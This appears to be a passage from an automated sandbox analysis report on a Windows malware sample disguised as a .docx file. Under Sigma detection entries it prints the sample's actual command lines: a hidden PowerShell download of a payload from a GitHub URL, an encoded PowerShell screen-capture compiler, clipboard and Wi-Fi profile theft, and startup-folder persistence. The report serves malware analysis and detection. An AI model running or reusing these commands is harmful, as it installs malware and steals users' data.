AgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7384, ProcessName: cmd.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", ProcessId: 5216, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", ProcessId: 5216, ProcessName: powershell.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetFilename: C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", ProcessId: 5216, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4484, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7488, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\chost.exe

ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: Cooperative Agreement0000800380.docx.exe

ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Cooperative Agreement0000800380.docx.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe

Unpacked PE file: 0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack

Source: Cooperative Agreement0000800380.docx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49733 version: TLS 1.2

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: chost.exe, 00000011.00000002.2386022109.00007FFE0C0A1000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2007196096.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: chost.exe, 00000011.00000002.2383172319.00007FFDF7852000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: chost.exe, 00000010.00000003.2007994678.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: chost.exe, 00000010.00000003.2011030564.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
Source:	Binary string: \4q.pdb source: powershell.exe, 0000004F.00000002.2286266418.0000014E183F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: chost.exe, 00000010.00000003.2001935182.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, chost.exe, 00000011.00000002.2386288251.00007FFE0E143000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2010088702.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019463574.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: chost.exe, 00000010.00000003.2009525097.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.16.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008304877.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: chost.exe, 00000010.00000003.2008471606.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008775784.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.16.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: chost.exe, 00000011.00000002.2386622767.00007FFE120C1000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009942650.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018181506.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
